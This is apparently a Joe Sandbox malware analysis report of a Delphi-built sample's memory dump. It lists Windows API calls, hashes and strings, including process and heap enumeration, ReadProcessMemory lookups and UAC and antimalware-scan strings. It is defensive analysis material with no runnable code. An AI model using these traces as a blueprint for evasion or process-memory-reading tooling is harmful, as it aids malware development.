                                                                                        • Opcode ID: 481863d72998645319ac5e7b3048b94b466fb704b7a1b46bd4ac6328c852f1c5
                                                                                        • Instruction ID: d47b9f504c21f15a22c7004cb3d1549ae99c68ed1e721b69772ac58b2669f714
                                                                                        • Opcode Fuzzy Hash: 481863d72998645319ac5e7b3048b94b466fb704b7a1b46bd4ac6328c852f1c5
                                                                                        • Instruction Fuzzy Hash: F6E0ED75200208BBEB13EB63DC61D8E7BFDDB8E700BA104B1E90193610DA31AE0088B0
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027D5886
                                                                                          • Part of subcall function 027D5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,027D0000,027FE790), ref: 027D5AE8
                                                                                          • Part of subcall function 027D5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027D0000,027FE790), ref: 027D5B06
                                                                                          • Part of subcall function 027D5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027D0000,027FE790), ref: 027D5B24
                                                                                          • Part of subcall function 027D5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027D5B42
                                                                                          • Part of subcall function 027D5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027D5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D5B8B
                                                                                          • Part of subcall function 027D5ACC: RegQueryValueExA.ADVAPI32(?,027D5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027D5BD1,?,80000001), ref: 027D5BA9
                                                                                          • Part of subcall function 027D5ACC: RegCloseKey.ADVAPI32(?,027D5BD8,00000000,?,?,00000000,027D5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D5BCB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                        • String ID:
                                                                                        • API String ID: 2796650324-0
                                                                                        • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                        • Instruction ID: 74db4097aefe0c216075f0d6fad94a1de84f50ffb3d658e2807117a1dfdf44d8
                                                                                        • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                        • Instruction Fuzzy Hash: 16E09271A003148FCB10DE9CC9C5B5637E8AF48750F480961EC58CF346D7B1D9108BD0
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 027D7DF4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                        • Instruction ID: 8f1760e1847f266f59a27c5afbc7100f145bf6179ee8ec1720bc08875c16b9c2
                                                                                        • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                        • Instruction Fuzzy Hash: FCD05BB23081507AE224955AAD44EA75BECCBC6771F10073DF568C7180D7208C01C671
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,027F0714,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,UacInitialize), ref: 027D7E67
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
                                                                                        • Instruction ID: fca83eea63b30276686a1553a8d7284d7c7d127178471c9fdfb4b01191db4ade
                                                                                        • Opcode Fuzzy Hash: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
                                                                                        • Instruction Fuzzy Hash: D8C02BF13012000A5E5865FC3CCD24953EE0D042383640F21F4F8CF2E2D332E8A32810
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,027F3891,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,Initialize), ref: 027D7E8B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                        • Instruction ID: 20ec2e0469e27167eba0039328b88337e2119cd09d4c02bdc5d5c1f3dff57a73
                                                                                        • Opcode Fuzzy Hash: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                        • Instruction Fuzzy Hash: C0C02BF33112000E1E64A7FC2CCC21943ED09841347601F21F478CB3C1D326E8232820
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID:
                                                                                        • API String ID: 3341692771-0
                                                                                        • Opcode ID: 8f59a01dc2def63d57c38a763d75440e0a15885831eefe8f9f31431ff0765006
                                                                                        • Instruction ID: 12f595c1628110c02b86e170e4ba736ceb2ba8dbc68d944ddfa7e6941ce41d20
                                                                                        • Opcode Fuzzy Hash: 8f59a01dc2def63d57c38a763d75440e0a15885831eefe8f9f31431ff0765006
                                                                                        • Instruction Fuzzy Hash: EFC012A660123057EB215699ECC475262EC9B05295B1404A1D408D7250E370980046A0
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        • SysReAllocStringLen.OLEAUT32(027FC858,027EF798,000000B4), ref: 027D4CB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 344208780-0
                                                                                        • Opcode ID: 60f216499253b9dff2cac0f6af8fdc80ea07a63062dd34f7668bbc85ccb701f1
                                                                                        • Instruction ID: a267a6afe7a81ee47134d846e8b06003ed0badd2e95e039256669834d837e891
                                                                                        • Opcode Fuzzy Hash: 60f216499253b9dff2cac0f6af8fdc80ea07a63062dd34f7668bbc85ccb701f1
                                                                                        • Instruction Fuzzy Hash: 2AD080743011056DAF3C8B27D578D37717AD9D12057CCCF5D980E5A264D735D401CA70
                                                                                        APIs
                                                                                        • timeSetEvent.WINMM(00002710,00000000,027FC528,00000000,00000001), ref: 027FC544
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Eventtime
                                                                                        • String ID:
                                                                                        • API String ID: 2982266575-0
                                                                                        • Opcode ID: 2306ddbc62d4188e185a27de53064066f351e1047fa201482fbf09ca147a7d87
                                                                                        • Instruction ID: dd6fd052a46f5c46d904abcc1999f8f38f3d5a096667b33c43ae5821f7877832
                                                                                        • Opcode Fuzzy Hash: 2306ddbc62d4188e185a27de53064066f351e1047fa201482fbf09ca147a7d87
                                                                                        • Instruction Fuzzy Hash: FFC092F17C93043EFA1296AA5CC2F7315EDD709B01F24046AB702EE2D1D2F249108A20
                                                                                        APIs
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 027D4C3F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 2525500382-0
                                                                                        • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                        • Instruction ID: d43cdc19a0f65747f7beffae656f74d2667a030949ea38f71018b38ad5659b80
                                                                                        • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                        • Instruction Fuzzy Hash: FDB0123430920115FB1823A38F24733007D0B40286FC404919F1CD80D6FB11D0038C35
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 027D4C57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID:
                                                                                        • API String ID: 3341692771-0
                                                                                        • Opcode ID: ae581ebb92addf67a3a65b39d43af7ed10248a7cf14a7419a8a23d03648cf3b3
                                                                                        • Instruction ID: fff429f9d8f6520fbedf56dcf1241ac09eccca792774b564aaf722ce67a10c45
                                                                                        • Opcode Fuzzy Hash: ae581ebb92addf67a3a65b39d43af7ed10248a7cf14a7419a8a23d03648cf3b3
                                                                                        • Instruction Fuzzy Hash: EAA022AC2003030A8F0B33AC803023F22333FC23003C8C8E882080A0008F3B8000AC30
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,027D1A03,?,027D2000), ref: 027D15E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 09ed435df44834b811771051a7cd9ab1f27a8f59dc3d495ae3c6c85f46c6c1c3
                                                                                        • Instruction ID: e1184fa4abd0b97953f3034a31af54fbf401977bc2cd0eabc17bcb21de2aef28
                                                                                        • Opcode Fuzzy Hash: 09ed435df44834b811771051a7cd9ab1f27a8f59dc3d495ae3c6c85f46c6c1c3
                                                                                        • Instruction Fuzzy Hash: AFF049F4B413004FEF15CFB999443027AE2E789344F55C579D609DB3C8E77184098B20
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,027D2000), ref: 027D16A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 4970d546093d5fc92728a2b9262876d9ea5c6c38dc738b8063b007c3852547b9
                                                                                        • Instruction ID: 0c2e52c6011463738cbc677182f28eb649d4bfd490d97f78a9613f6630cd6335
                                                                                        • Opcode Fuzzy Hash: 4970d546093d5fc92728a2b9262876d9ea5c6c38dc738b8063b007c3852547b9
                                                                                        • Instruction Fuzzy Hash: 0DF0F0FAB006946FD3218E5A9C80782BBA0FB00310F054139EA8897381D770A8148B98
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,027D1FE4), ref: 027D1704
Memory Dump Source
• Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
• Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_27d0000_x.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,027EAC5B,?,?,027EACED,00000000,027EADC9), ref: 027EA9E8
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 027EAA00
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 027EAA12
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 027EAA24
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 027EAA36
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 027EAA48
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 027EAA5A
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 027EAA6C
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 027EAA7E
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 027EAA90
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 027EAAA2
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 027EAAB4
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 027EAAC6
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 027EAAD8
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 027EAAEA
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 027EAAFC
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 027EAB0E
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5925
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 027D593C
• lstrcpynA.KERNEL32(?,?,?), ref: 027D596C
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D59D0
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5A06
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5A19
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5A2B
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000,027FE790), ref: 027D5A37
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C,027D0000), ref: 027D5A6B
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027D737C), ref: 027D5A77
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 027D5A99
Strings
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027D5BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027D5BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027D5BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027D5C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027D5CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027D5CEB
Strings
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 027D7FF5
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DA7E2
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• GetVersionExA.KERNEL32(?,027FD106,00000000,027FD11E), ref: 027DB79A
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,027DBE72,00000000,027DC08B,?,?,00000000,00000000), ref: 027DA823
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
                                                                                        Similarity
                                                                                        • API ID: LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 481472006-0
                                                                                        • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                        • Instruction ID: f75122e12ea53b13a10ae4fb423491a24eb2dca2e27d63284c27b05072b011ba
                                                                                        • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                        • Instruction Fuzzy Hash: 3DA0124440482041854033181C0263430649810A20FC4878068F8402D0E91D01208093
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 027DD29D
                                                                                          • Part of subcall function 027DD268: GetProcAddress.KERNEL32(00000000), ref: 027DD281
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
